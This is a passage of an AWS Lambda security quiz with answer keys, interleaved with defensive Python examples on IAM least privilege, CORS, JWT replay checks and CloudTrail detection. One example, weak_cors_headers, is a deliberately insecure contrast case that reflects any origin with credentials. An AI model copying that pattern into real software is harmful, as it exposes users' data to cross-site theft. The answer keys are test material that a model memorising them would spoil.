A) Restrict execution with IAM permissions and API Gateway authentication
B) Allow unrestricted public access to the function
C) Store AWS credentials inside the function code
D) Increase function timeout
β
Answer: A) Restrict execution with IAM permissions and API Gateway authentication
π Explanation: IAM policies and API Gateway authentication ensure only authorized users or services can invoke the function.
101. What is a potential risk of storing unencrypted data in Amazon S3 for Lambda functions?
A) Data exposure if the S3 bucket is compromised
B) Lower function execution time
C) Reduced Lambda execution concurrency
D) Faster API response times
β
Answer: A) Data exposure if the S3 bucket is compromised
π Explanation: Unencrypted data in S3 can be leaked if the bucket permissions are misconfigured or an attacker gains access.
102. How can AWS IAM role trust policies improve Lambda security?
A) By restricting which entities can assume the Lambda execution role
B) By increasing function concurrency
C) By reducing function execution time
D) By allowing all AWS accounts to assume the role
β
Answer: A) By restricting which entities can assume the Lambda execution role
π Explanation: IAM role trust policies define which AWS accounts or services can assume a role, preventing unauthorized use.
103. How does using AWS Secrets Manager enhance Lambda security?
A) It securely stores and rotates secrets used in Lambda functions
B) It reduces function memory usage
C) It disables IAM permissions
D) It speeds up function execution
β
Answer: A) It securely stores and rotates secrets used in Lambda functions
π Explanation: AWS Secrets Manager ensures sensitive data is stored securely and can be automatically rotated to minimize exposure risks.
104. What is the impact of excessive logging in AWS Lambda?
A) Increased CloudWatch costs and potential data leakage
B) Lower function execution time
C) Improved IAM security
D) Faster API response times
β
Answer: A) Increased CloudWatch costs and potential data leakage
π Explanation: Over-logging can increase AWS costs and expose sensitive information if logs are not properly configured.
105. How can time-based authentication tokens improve Lambda security?
A) By preventing replay attacks
B) By reducing API Gateway request latency
C) By increasing function concurrency
D) By eliminating the need for IAM authentication
β
Answer: A) By preventing replay attacks
π Explanation: Time-based authentication tokens (e.g., JWT with expiration times) ensure that requests cannot be reused maliciously.
106. What AWS feature can automatically rotate security credentials for Lambda functions?
A) AWS Secrets Manager
B) AWS CloudTrail
C) AWS Auto Scaling
D) AWS CloudFront
β
Answer: A) AWS Secrets Manager
π Explanation: Secrets Manager helps securely store and automatically rotate sensitive credentials.
107. How does AWS X-Ray contribute to Lambda security?
A) By providing end-to-end request tracing to detect unusual activity
B) By reducing Lambda function execution costs
C) By encrypting Lambda function responses
D) By eliminating the need for IAM roles
β
Answer: A) By providing end-to-end request tracing to detect unusual activity
π Explanation: AWS X-Ray helps trace requests, allowing detection of anomalies or security threats in Lambda execution.
108. What is the security risk of using broad IAM permissions in AWS Lambda?
A) Privilege escalation and unauthorized access
B) Reduced function execution time
C) Increased function memory allocation
D) Improved API performance
β
Answer: A) Privilege escalation and unauthorized access
π Explanation: Broad IAM permissions allow attackers to access unintended AWS services or escalate privileges.
109. How can AWS Config help improve Lambda security?
A) By detecting non-compliant configurations and misconfigurations
B) By reducing function execution time
C) By allowing unrestricted API access
D) By disabling IAM authentication
β
Answer: A) By detecting non-compliant configurations and misconfigurations
π Explanation: AWS Config monitors AWS Lambda configurations, ensuring best security practices are followed.
110. How can network ACLs enhance AWS Lambda security?
A) By blocking unauthorized inbound and outbound traffic
B) By increasing Lambda function speed
C) By improving API response times
D) By reducing IAM security requirements
β
Answer: A) By blocking unauthorized inbound and outbound traffic
π Explanation: Network ACLs (NACLs) are stateless, subnet-level allow/deny rules that add a second layer after security groups for a VPC-attached function, limiting where the function's network interfaces can send traffic. They apply only when the function is attached to a VPC, and because the Lambda service invokes the function rather than connecting into the subnet, the outbound rules are the ones that matter.
111. How can AWS Identity and Access Management (IAM) roles improve Lambda security?
A) By restricting access to AWS resources based on least privilege
B) By allowing unrestricted execution of all Lambda functions
C) By increasing function execution speed
D) By disabling logging to reduce security risks
β
Answer: A) By restricting access to AWS resources based on least privilege
π Explanation: IAM roles should follow the least privilege principle, ensuring Lambda functions have only the permissions they need.
112. What is the primary security risk of using a default VPC for AWS Lambda?
A) It may expose Lambda functions to unauthorized outbound traffic
B) It increases Lambda function memory usage
C) It improves function execution latency
D) It allows IAM roles to be modified dynamically
β
Answer: A) It may expose Lambda functions to unauthorized outbound traffic
π Explanation: The default VPC's default security group allows all outbound traffic and its subnets are public, so a function attached to it has no egress restriction beyond what you add yourself. Lambda network interfaces do not receive public IPs, so the function reaches the internet only through a NAT gateway; use purpose-built private subnets with locked-down security groups instead.
113. How can AWS Lambda be protected from unintended event triggers?
A) Use resource policies to limit allowed event sources
B) Disable IAM authentication
C) Increase the function timeout
D) Store AWS credentials inside function code
β
Answer: A) Use resource policies to limit allowed event sources
π Explanation: Resource-based policies can restrict which AWS services or accounts are allowed to trigger Lambda functions.
114. What is the impact of failing to define maximum execution time for AWS Lambda?
A) Potential risk of Denial-of-Service (DoS) attacks
B) Faster API response time
C) Lower AWS billing costs
D) Increased IAM role security
β
Answer: A) Potential risk of Denial-of-Service (DoS) attacks
π Explanation: Lambda always enforces a timeout (3 seconds by default, 15 minutes at most), so the real mistake is setting it far higher than the function needs: a runaway loop, a slow upstream, or an attacker-triggered invocation then holds an execution environment and a unit of concurrency for minutes at a time, which amplifies DoS and cost. Set the timeout just above the function's observed worst-case duration.
115. What is the best way to store sensitive credentials for use in AWS Lambda?
A) Use AWS Secrets Manager or AWS Systems Manager Parameter Store
B) Hardcode credentials in function environment variables
C) Store credentials in plaintext files inside the function code
D) Pass credentials via API query parameters
β
Answer: A) Use AWS Secrets Manager or AWS Systems Manager Parameter Store
π Explanation: Secrets Manager and Parameter Store securely manage sensitive credentials without exposing them in code.
116. What risk does an open API Gateway endpoint connected to Lambda pose?
A) Increased exposure to unauthorized API abuse
B) Faster function execution time
C) Lower AWS billing costs
D) Improved response times
β
Answer: A) Increased exposure to unauthorized API abuse
π Explanation: Open API Gateway endpoints allow attackers to send malicious requests, leading to DoS, brute force, or injection attacks.
117. How can an attacker exploit unvalidated input in an AWS Lambda function?
A) By injecting malicious payloads into event triggers
B) By reducing the function execution time
C) By increasing AWS storage usage
D) By modifying IAM permissions dynamically
β
Answer: A) By injecting malicious payloads into event triggers
π Explanation: Without input validation, attackers can manipulate event data (from S3, SNS, API Gateway) to trigger unintended behaviors.
118. What is the recommended way to restrict outbound traffic from AWS Lambda?
A) Use VPC security groups and network ACLs
B) Allow all outbound traffic for flexibility
C) Store traffic rules in function logs
D) Increase function execution timeout
β
Answer: A) Use VPC security groups and network ACLs
π Explanation: VPC security groups and network ACLs allow fine-grained control over which outbound connections are permitted.
119. What is a risk of granting AWS Lambda functions full access to DynamoDB?
A) The function may read or delete sensitive data unnecessarily
B) The function may execute faster than expected
C) AWS automatically restricts access dynamically
D) It reduces Lambda execution costs
β
Answer: A) The function may read or delete sensitive data unnecessarily
π Explanation: Overly permissive IAM roles (dynamodb:* on Resource "*") let a Lambda function, and therefore anyone who compromises it, read, modify or delete far more data than its job requires; grant only the specific actions (for example dynamodb:GetItem and dynamodb:Query) on the specific table ARN.
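The least-privilege point made in questions 83, 108 and 119 is easiest to see as an actual execution-role policy. The following is an added example and is not part of the quiz: it builds a policy scoped to one DynamoDB table and audits a policy document for wildcard actions, wildcard resources and destructive actions. The region, account ID, table name and log-group ARN are placeholders.

```python
"""Scope a Lambda execution role to one DynamoDB table and audit a policy for wildcards.

Added example, not the quiz's own code. All ARNs, names and IDs are placeholders.
"""
import json
from typing import Iterable

REGION = "us-east-1"                                   # placeholder
ACCOUNT_ID = "111122223333"                            # placeholder account
TABLE_ARN = f"arn:aws:dynamodb:{REGION}:{ACCOUNT_ID}:table/Orders"
LOG_GROUP_ARN = f"arn:aws:logs:{REGION}:{ACCOUNT_ID}:log-group:/aws/lambda/order-read:*"

# The kind of policy question 119 warns about: every DynamoDB action on every table.
FULL_ACCESS_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "dynamodb:*", "Resource": "*"}],
}


def least_privilege_policy(table_arn: str, actions: Iterable[str], log_group_arn: str) -> dict:
    """Grant only the listed DynamoDB actions on one table, plus writing the function's own logs."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {"Sid": "TableAccess", "Effect": "Allow", "Action": sorted(set(actions)), "Resource": table_arn},
            {"Sid": "OwnLogs", "Effect": "Allow",
             "Action": ["logs:CreateLogStream", "logs:PutLogEvents"], "Resource": log_group_arn},
        ],
    }


def audit_policy(policy: dict) -> list:
    """Return findings for Allow statements that use wildcards or destructive actions."""
    findings = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", "<no Sid>")
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else list(actions)
        resources = st.get("Resource", [])
        resources = [resources] if isinstance(resources, str) else list(resources)
        for action in actions:
            if action == "*" or action.endswith(":*"):
                findings.append(f"{sid}: wildcard action {action}")
            elif action.split(":", 1)[-1].startswith("Delete"):
                findings.append(f"{sid}: destructive action {action}, confirm it is required")
        if "*" in resources:
            findings.append(f"{sid}: wildcard resource")
    return findings


if __name__ == "__main__":
    scoped = least_privilege_policy(TABLE_ARN, ["dynamodb:GetItem", "dynamodb:Query"], LOG_GROUP_ARN)
    print(json.dumps(scoped, indent=2))
    print("full-access findings:", audit_policy(FULL_ACCESS_POLICY))   # two findings
    print("scoped findings:", audit_policy(scoped))                    # []
```

The audit is deliberately simple (it does not evaluate Deny statements or conditions); in practice pair it with IAM Access Analyzer's policy validation and with the last-accessed data IAM exposes for the role, which shows which granted actions the function has actually used.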
120. How does AWS Shield help protect Lambda applications?
A) It mitigates Distributed Denial-of-Service (DDoS) attacks
B) It increases function execution time
C) It automatically patches security vulnerabilities
D) It removes the need for IAM authentication
β
Answer: A) It mitigates Distributed Denial-of-Service (DDoS) attacks
π Explanation: AWS Shield (Standard & Advanced) helps protect against DDoS attacks that can target API Gateway and Lambda functions.
121. What is a potential risk of allowing Lambda to connect to external databases?
A) The function may send sensitive data to unauthorized endpoints
B) AWS automatically encrypts external traffic
C) It improves database query speed
D) Lambda functions can scale faster
β
Answer: A) The function may send sensitive data to unauthorized endpoints
π Explanation: Poorly configured connections can allow Lambda to leak sensitive data to external systems.
122. What AWS feature automatically revokes old security credentials?
A) AWS Secrets Manager
B) AWS CloudFront
C) AWS Auto Scaling
D) AWS X-Ray
β
Answer: A) AWS Secrets Manager
π Explanation: AWS Secrets Manager supports automatic credential rotation, reducing security risks from stale credentials.
123. How can AWS WAF help protect Lambda functions?
A) By filtering malicious requests before they reach API Gateway
B) By increasing function execution concurrency
C) By disabling IAM authentication
D) By allowing unrestricted event triggers
β
Answer: A) By filtering malicious requests before they reach API Gateway
π Explanation: AWS WAF blocks malicious requests, preventing SQL injection, XSS, and API abuse attacks.
124. How can time-based tokens (JWT, OAuth) improve Lambda security?
A) They prevent replay attacks and unauthorized access
B) They reduce function execution time
C) They allow unrestricted API access
D) They replace IAM permissions
β
Answer: A) They prevent replay attacks and unauthorized access
π Explanation: Time-based authentication tokens ensure requests expire and cannot be reused for unauthorized access.
125. What is a risk of logging sensitive data in AWS Lambda?
A) Attackers may extract secrets from CloudWatch logs
B) Logs improve function execution speed
C) Lambda functions execute faster
D) AWS automatically encrypts all logs
β
Answer: A) Attackers may extract secrets from CloudWatch logs
π Explanation: Sensitive data should never be logged, as logs can be accessed by unauthorized users if misconfigured.
126. What security measure should be taken when using Lambda@Edge?
A) Ensure IAM policies follow least privilege
B) Allow unrestricted global execution
C) Store all sensitive data inside function logs
D) Enable full public access for flexibility
β
Answer: A) Ensure IAM policies follow least privilege
π Explanation: Lambda@Edge should only have necessary permissions to reduce the risk of privilege escalation and data leaks.
127. What is a potential risk of misconfigured VPC peering for AWS Lambda?
A) Unintended network exposure
B) Improved function execution time
C) Faster API Gateway responses
D) Lower AWS billing
β
Answer: A) Unintended network exposure
π Explanation: Improper VPC peering can allow Lambda to communicate with unintended resources, leading to security risks.
128. What is the security risk of exposing AWS Lambda directly to the internet without an API Gateway?
A) Unauthorized users can invoke the function, leading to data exposure or misuse
B) The function execution time increases
C) AWS automatically blocks public invocations
D) IAM policies are disabled automatically
β
Answer: A) Unauthorized users can invoke the function, leading to data exposure or misuse
π Explanation: Lambda functions should be reachable only through a layer that authenticates and filters requests: API Gateway with an authorizer, WAF and throttling, an Application Load Balancer, or a function URL with AuthType AWS_IAM. Direct invocation is then limited to the principals named in the function's resource-based policy.
129. What is a best practice for securing inter-service communication between Lambda functions?
A) Use AWS IAM roles and signed authentication tokens
B) Allow unrestricted API access
C) Store access credentials in Lambda environment variables
D) Pass authentication details in plaintext HTTP headers
β
Answer: A) Use AWS IAM roles and signed authentication tokens
π Explanation: IAM roles and signed tokens (JWT, OAuth) ensure that only authorized services communicate with Lambda functions.
130. How does AWS KMS (Key Management Service) help enhance security in Lambda?
A) Encrypts sensitive data before storing or processing it
B) Increases Lambda execution speed
C) Disables API Gateway logging
D) Reduces function concurrency
β
Answer: A) Encrypts sensitive data before storing or processing it
π Explanation: AWS KMS manages the keys used to encrypt data at rest: Lambda environment variables, and any application data the function protects through the Encrypt/Decrypt APIs or envelope encryption with data keys. Encryption in transit is provided by TLS on the AWS API endpoints, not by KMS.
131. Why is it important to set IAM conditions when granting Lambda permissions?
A) To restrict who, where, and when a Lambda function can be invoked
B) To improve function execution time
C) To reduce AWS billing costs
D) To allow all AWS accounts access
β
Answer: A) To restrict who, where, and when a Lambda function can be invoked
π Explanation: IAM conditions help enforce access controls, limiting unwanted or malicious Lambda invocations.
132. What security risk can occur due to unrestricted Lambda Layer sharing?
A) Attackers can inject malicious code into a shared Lambda Layer
B) Lambda functions execute faster
C) API Gateway responses become slower
D) AWS automatically prevents unauthorized access
β
Answer: A) Attackers can inject malicious code into a shared Lambda Layer
π Explanation: Layer versions are immutable once published, so an attacker cannot alter a version your function already references; the risks are that a publicly shared layer exposes your code to anyone, and that a function consuming a layer from an account you do not control is executing that account's code. Share layers only with named accounts or your organization, and treat third-party layers as unvetted dependencies to be scanned and pinned.
133. How can AWS Config improve Lambda security?
A) Detects non-compliant security configurations and alerts users
B) Disables IAM policies
C) Increases function concurrency
D) Stores Lambda logs
β
Answer: A) Detects non-compliant security configurations and alerts users
π Explanation: AWS Config continuously audits Lambda functions for misconfigurations, insecure IAM roles, and best practices violations.
134. What is a risk of allowing AWS Lambda to assume multiple IAM roles dynamically?
A) Potential privilege escalation if roles are not properly restricted
B) Lower AWS billing
C) Faster function execution
D) Increased API Gateway caching
β
Answer: A) Potential privilege escalation if roles are not properly restricted
π Explanation: If Lambda is allowed to assume multiple roles, attackers could escalate privileges by switching to higher-permission roles.
135. How can AWS Lambda logs be protected from unauthorized access?
A) Restrict CloudWatch Logs access using IAM policies
B) Enable verbose logging for easier debugging
C) Store logs in plaintext S3 buckets
D) Disable logging completely
β
Answer: A) Restrict CloudWatch Logs access using IAM policies
π Explanation: IAM policies should enforce access control over logs to prevent attackers from retrieving sensitive execution details.
136. What security risk does misconfigured API Gateway CORS settings pose?
A) Allows unauthorized cross-origin requests
B) Reduces function concurrency
C) Increases function execution latency
D) Reduces API Gateway costs
β
Answer: A) Allows unauthorized cross-origin requests
π Explanation: Improper CORS settings can allow attackers to steal sensitive data by making requests from malicious origins.
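Question 136 in code: the weak configuration (reflecting whatever Origin the browser sent, together with Allow-Credentials) beside the corrected one for a Lambda proxy-integration handler. This is an added example, not the quiz's own code; the allowed origins are placeholders, and the event shape assumed is the API Gateway HTTP API payload version 2, which lower-cases header names.

```python
"""Return CORS headers only for an allowlisted origin.

Added example, not from the quiz. Origins are placeholders.
"""
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}   # placeholders


def weak_cors_headers(request_headers: dict) -> dict:
    """Reflects any Origin: any site can make credentialed requests and read the response."""
    origin = request_headers.get("origin", "*")
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_headers(request_headers: dict) -> dict:
    """Echo the Origin only if it is allowlisted; otherwise send no CORS grant at all."""
    origin = request_headers.get("origin")
    if origin not in ALLOWED_ORIGINS:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Access-Control-Allow-Methods": "GET,POST",
        "Access-Control-Allow-Headers": "Authorization,Content-Type",
        "Vary": "Origin",   # caches must not serve one origin's grant to another origin
    }


def handler(event, context=None):
    # HTTP API (payload v2) delivers header names in lower case; normalise anyway.
    headers = {k.lower(): v for k, v in (event.get("headers") or {}).items()}
    cors = cors_headers(headers)
    method = event.get("requestContext", {}).get("http", {}).get("method")
    if method == "OPTIONS":
        # Preflight: 204 with the grant for allowed origins, 403 and no grant otherwise.
        return {"statusCode": 204 if cors else 403, "headers": cors, "body": ""}
    return {"statusCode": 200,
            "headers": {**cors, "Content-Type": "application/json"},
            "body": '{"ok": true}'}
```

If API Gateway's own CORS configuration is used instead, the same rule applies: list explicit origins, never "*" together with allowCredentials.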
137. What is a best practice to prevent unauthorized replay attacks on AWS Lambda?
A) Use time-based authentication tokens (e.g., JWT with expiration)
B) Allow all API Gateway requests
C) Store API keys in plaintext logs
D) Increase function execution timeout
β
Answer: A) Use time-based authentication tokens (e.g., JWT with expiration)
π Explanation: Time-based authentication (e.g., OAuth, JWT expiry) prevents previously captured tokens from being reused.
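Questions 105, 124 and 137 all rest on the same mechanism, so here is one added example (not the quiz's code) of what a Lambda authorizer must actually check: the HS256 signature, the exp and nbf window with a little clock leeway, and a jti that has not been seen before. It uses only the standard library so it runs offline; the signing key and claims are made up, and the in-memory jti store stands in for a shared store such as a DynamoDB table with TTL. In production a vetted JWT library would do the parsing; the interesting part is the time and replay checks.

```python
"""Verify an HS256 JWT, enforce exp/nbf, and reject replayed token IDs.

Added example, not from the quiz. Key and claims are placeholders.
"""
import base64
import hashlib
import hmac
import json
import time

SECRET = b"placeholder-signing-key-change-me"   # placeholder shared secret


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(claims: dict, key: bytes = SECRET) -> str:
    """Issue a token (what the identity provider does); included so the example is self-contained."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


class TokenError(Exception):
    pass


class Verifier:
    """Checks signature and time window, and remembers each jti until the token would expire."""

    def __init__(self, key: bytes = SECRET, leeway: int = 30, now=time.time):
        self.key = key
        self.leeway = leeway
        self.now = now          # injectable clock so the checks can be tested deterministically
        self._seen = {}         # jti -> exp; a shared store (DynamoDB + TTL) in a real authorizer

    def verify(self, token: str) -> dict:
        try:
            h, b, s = token.split(".")
            header = json.loads(_b64url_decode(h))
            signature = _b64url_decode(s)
        except ValueError:
            raise TokenError("malformed token")
        if header.get("alg") != "HS256":                 # never let the token choose the algorithm
            raise TokenError("unexpected alg")
        expected = hmac.new(self.key, f"{h}.{b}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, signature):
            raise TokenError("bad signature")
        claims = json.loads(_b64url_decode(b))
        now = self.now()
        if "exp" not in claims or now > claims["exp"] + self.leeway:
            raise TokenError("expired or missing exp")
        if now < claims.get("nbf", 0) - self.leeway:
            raise TokenError("not yet valid")
        jti = claims.get("jti")
        if jti is None:
            raise TokenError("missing jti")
        self._purge(now)
        if jti in self._seen:
            raise TokenError("replayed token")
        self._seen[jti] = claims["exp"]
        return claims

    def _purge(self, now):
        """Forget jti values whose tokens can no longer pass the exp check."""
        for jti, exp in list(self._seen.items()):
            if now > exp + self.leeway:
                del self._seen[jti]
```

Short lifetimes and the jti check are what bound replay: a stolen token is useful only until exp, and a captured request cannot be submitted twice. Bounding the store by exp keeps it from growing without limit.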
138. Why should IAM roles for Lambda functions be tightly scoped?
A) To reduce attack surfaces and prevent privilege escalation
B) To speed up function execution
C) To enable unrestricted resource access
D) To increase logging verbosity
β
Answer: A) To reduce attack surfaces and prevent privilege escalation
π Explanation: Broad IAM permissions make it easier for attackers to exploit excessive privileges.
139. What risk arises from allowing AWS Lambda to make unrestricted outbound network requests?
A) Data exfiltration to unauthorized external servers
B) Increased function execution time
C) Lower AWS billing
D) Faster API response times
β
Answer: A) Data exfiltration to unauthorized external servers
π Explanation: If not restricted, an exploited Lambda function could send sensitive data to attacker-controlled endpoints.
140. How can AWS WAF help protect AWS Lambda functions?
A) By blocking malicious web requests before they reach API Gateway
B) By increasing function concurrency
C) By reducing Lambda execution time
D) By automatically encrypting responses
β
Answer: A) By blocking malicious web requests before they reach API Gateway
π Explanation: AWS WAF filters out malicious traffic, preventing API abuse, SQL injection, and bot-based attacks.
141. What happens if an AWS Lambda function has no concurrency limits set?
A) It may experience excessive invocations, leading to denial-of-service (DoS) risks
B) It will execute faster
C) It will require fewer IAM permissions
D) AWS automatically blocks high invocation rates
β
Answer: A) It may experience excessive invocations, leading to denial-of-service (DoS) risks
π Explanation: Without concurrency limits, Lambda functions can be spammed with invocations, consuming resources uncontrollably.
142. Why should AWS Lambda environment variables be encrypted?
A) To prevent credential exposure if logs are compromised
B) To increase function execution speed
C) To reduce API Gateway response latency
D) To allow unrestricted access
β
Answer: A) To prevent credential exposure if logs are compromised
π Explanation: Lambda encrypts environment variables at rest with a KMS key by default, but anyone with lambda:GetFunctionConfiguration sees their plaintext in the console and API, and a function that logs or dumps its environment leaks them to CloudWatch. A customer managed key limits decryption to principals with kms:Decrypt on that key, and client-side encryption helpers keep the value as ciphertext until the function decrypts it at run time; better still, store only a secret name in the variable and fetch the value from Secrets Manager or Parameter Store.
143. What is a risk of allowing AWS Lambda to write directly to public S3 buckets?
A) Attackers could overwrite or exfiltrate sensitive data
B) Lambda functions will execute slower
C) API Gateway latency will increase
D) CloudWatch logs will not capture function activity
β
Answer: A) Attackers could overwrite or exfiltrate sensitive data
π Explanation: Public S3 buckets allow unauthorized users to read or manipulate data if permissions are misconfigured.
144. What is the primary risk of deploying AWS Lambda functions with excessive IAM permissions?
A) Privilege escalation allowing attackers to access more resources than intended
B) Increased function execution time
C) Reduced function concurrency
D) AWS automatically revokes excessive permissions
β
Answer: A) Privilege escalation allowing attackers to access more resources than intended
π Explanation: Overly permissive IAM roles can be exploited by attackers to access more AWS services or modify critical configurations.
145. How can an attacker exploit an AWS Lambda function that has access to a misconfigured S3 bucket?
A) By exfiltrating or modifying sensitive data stored in the bucket
B) By reducing Lambda function execution time
C) By triggering function cold starts
D) By increasing API Gateway latency
β
Answer: A) By exfiltrating or modifying sensitive data stored in the bucket
π Explanation: If the Lambda function has full access to an insecure S3 bucket, attackers can read, modify, or delete stored data.
146. What is a recommended method to detect unauthorized access attempts on AWS Lambda functions?
A) Enable AWS CloudTrail logs for Lambda API calls
B) Increase Lambda execution memory
C) Disable IAM policies temporarily
D) Store logs inside the function environment variables
β
Answer: A) Enable AWS CloudTrail logs for Lambda API calls
π Explanation: AWS CloudTrail logs track API activity, helping detect unauthorized access attempts and privilege escalation.
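Questions 89, 90 and 146 describe CloudTrail as the detection source for configuration changes and unauthorized access attempts; the added example below (not the quiz's code) shows the detection logic itself, run over four CloudTrail-shaped records constructed by hand with only the fields the checks read. The deployment-role ARN, user ARNs and function name are placeholders. Real Lambda eventName values carry API-version suffixes such as "20150331v2", which the code strips before matching; field names in requestParameters follow the API parameter names, so confirm them against a real record before relying on them.

```python
"""Flag risky Lambda control-plane calls in CloudTrail records.

Added example, not from the quiz. Records are constructed; ARNs are placeholders.
"""
import re

DEPLOY_ROLE_ARN = "arn:aws:iam::111122223333:role/ci-deploy"   # placeholder: the one identity allowed to change functions

SENSITIVE = {
    "UpdateFunctionCode", "UpdateFunctionConfiguration", "AddPermission",
    "CreateFunctionUrlConfig", "UpdateFunctionUrlConfig",
    "PutFunctionConcurrency", "DeleteFunctionConcurrency", "AddLayerVersionPermission",
}

_VERSION_SUFFIX = re.compile(r"\d{8}(v\d+)?$")   # e.g. "UpdateFunctionCode20150331v2"


def base_name(event_name: str) -> str:
    return _VERSION_SUFFIX.sub("", event_name)


def analyze(records) -> list:
    """Return one finding string per suspicious record/condition."""
    findings = []
    for rec in records:
        name = base_name(rec.get("eventName", ""))
        if name not in SENSITIVE:
            continue
        who = (rec.get("userIdentity") or {}).get("arn", "<unknown>")
        params = rec.get("requestParameters") or {}
        target = params.get("functionName", "?")
        if rec.get("errorCode"):
            # A denied change attempt is still a signal: someone is probing what they can do.
            findings.append(f"{name} on {target} by {who}: denied ({rec['errorCode']}), possible probing")
            continue
        if who != DEPLOY_ROLE_ARN:
            findings.append(f"{name} on {target} by {who}: change made outside the deploy role")
        if name == "AddPermission" and params.get("principal") == "*":
            findings.append(f"{name} on {target} by {who}: function opened to any principal")
        if name in ("CreateFunctionUrlConfig", "UpdateFunctionUrlConfig") and params.get("authType") == "NONE":
            findings.append(f"{name} on {target} by {who}: public function URL (authType NONE)")
    return findings


# Constructed sample records (not real CloudTrail output).
SAMPLE_RECORDS = [
    {"eventName": "UpdateFunctionCode20150331v2",
     "userIdentity": {"arn": DEPLOY_ROLE_ARN},
     "requestParameters": {"functionName": "order-ingest"}},
    {"eventName": "AddPermission20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev-bob"},
     "requestParameters": {"functionName": "order-ingest", "principal": "*",
                           "action": "lambda:InvokeFunction", "statementId": "open"}},
    {"eventName": "CreateFunctionUrlConfig",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/contractor/session"},
     "requestParameters": {"functionName": "order-ingest", "authType": "NONE"}},
    {"eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev-bob"},
     "requestParameters": {"functionName": "order-ingest"}, "errorCode": "AccessDenied"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_RECORDS):
        print(finding)
```

The same rules translate directly into EventBridge patterns on the CloudTrail event stream, which is the usual way to get them to page someone rather than running a script after the fact.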
147. What happens if an AWS Lambda function allows unrestricted execution from any AWS principal?
A) Anyone in AWS can invoke the function, leading to security vulnerabilities
B) The function executes faster
C) AWS automatically limits the number of invocations
D) The function is blocked from running
β
Answer: A) Anyone in AWS can invoke the function, leading to security vulnerabilities
π Explanation: If Lambda permissions are not properly scoped, external AWS accounts can invoke functions without restriction.
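Questions 78, 113 and 147 are all about the function's resource-based policy, so one added example (not the quiz's code) covers them: it builds the statement that lets only one S3 bucket in one account trigger the function, the statement that lets one named account invoke it, and a check that flags the open shapes (Principal "*", or a service principal with no SourceArn/SourceAccount condition, which lets any account's bucket trigger the function). The account IDs, function ARN and bucket ARN are placeholders. A public function URL is the same mistake in another form, since it needs a Principal "*" grant of lambda:InvokeFunctionUrl.

```python
"""Build and audit a Lambda resource-based (function) policy.

Added example, not from the quiz. Account IDs and ARNs are placeholders.
"""
import json

ACCOUNT_ID = "111122223333"                 # placeholder: the account that owns the bucket
FUNCTION_ARN = f"arn:aws:lambda:us-east-1:{ACCOUNT_ID}:function:order-ingest"
TRUSTED_BUCKET_ARN = "arn:aws:s3:::example-orders-bucket"   # placeholder


def s3_trigger_statement(function_arn: str, bucket_arn: str, owner_account: str) -> dict:
    """Only S3, only for one bucket owned by one account, may invoke the function.

    Equivalent to: aws lambda add-permission --principal s3.amazonaws.com
      --source-arn <bucket_arn> --source-account <owner_account> --action lambda:InvokeFunction
    """
    return {
        "Sid": "AllowS3FromTrustedBucket",
        "Effect": "Allow",
        "Principal": {"Service": "s3.amazonaws.com"},
        "Action": "lambda:InvokeFunction",
        "Resource": function_arn,
        "Condition": {
            "StringEquals": {"AWS:SourceAccount": owner_account},
            "ArnLike": {"AWS:SourceArn": bucket_arn},
        },
    }


def cross_account_statement(function_arn: str, caller_account: str) -> dict:
    """Allow one specific AWS account, never '*', to invoke the function."""
    return {
        "Sid": f"AllowInvokeFromAccount{caller_account}",
        "Effect": "Allow",
        "Principal": {"AWS": f"arn:aws:iam::{caller_account}:root"},
        "Action": "lambda:InvokeFunction",
        "Resource": function_arn,
    }


def build_policy(statements) -> str:
    return json.dumps({"Version": "2012-10-17", "Statement": list(statements)}, indent=2)


def open_statements(policy) -> list:
    """Return findings for Allow statements that any principal (or any account's resource) can use."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", "<no Sid>")
        principal = st.get("Principal")
        if principal == "*" or (isinstance(principal, dict) and principal.get("AWS") == "*"):
            findings.append(f"{sid}: any principal may invoke")
        elif isinstance(principal, dict) and "Service" in principal:
            cond = json.dumps(st.get("Condition", {})).lower()
            if "sourcearn" not in cond and "sourceaccount" not in cond:
                findings.append(f"{sid}: service principal {principal['Service']} "
                                "without SourceArn/SourceAccount condition")
    return findings


if __name__ == "__main__":
    policy = build_policy([
        s3_trigger_statement(FUNCTION_ARN, TRUSTED_BUCKET_ARN, ACCOUNT_ID),
        cross_account_statement(FUNCTION_ARN, "444455556666"),
    ])
    print(policy)
    print("findings:", open_statements(policy))   # []
```

To review what is deployed, run aws lambda get-policy on the function and feed the returned Policy string to open_statements; IAM Access Analyzer reports the same public and cross-account grants continuously.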
148. How does AWS Identity Federation improve AWS Lambda security?
A) By integrating external authentication providers (SAML, OAuth) to prevent unnecessary IAM role exposure
B) By increasing function execution time
C) By improving CloudWatch logging
D) By automatically blocking unauthorized users
β
Answer: A) By integrating external authentication providers (SAML, OAuth) to prevent unnecessary IAM role exposure
π Explanation: AWS Identity Federation allows secure authentication using third-party identity providers instead of direct IAM credentials.
149. What is a security risk of not setting a timeout for an AWS Lambda function?
A) A malicious function could run indefinitely, leading to denial-of-service (DoS) risks
B) It improves function performance
C) It reduces AWS costs
D) It prevents unauthorized API Gateway access
β
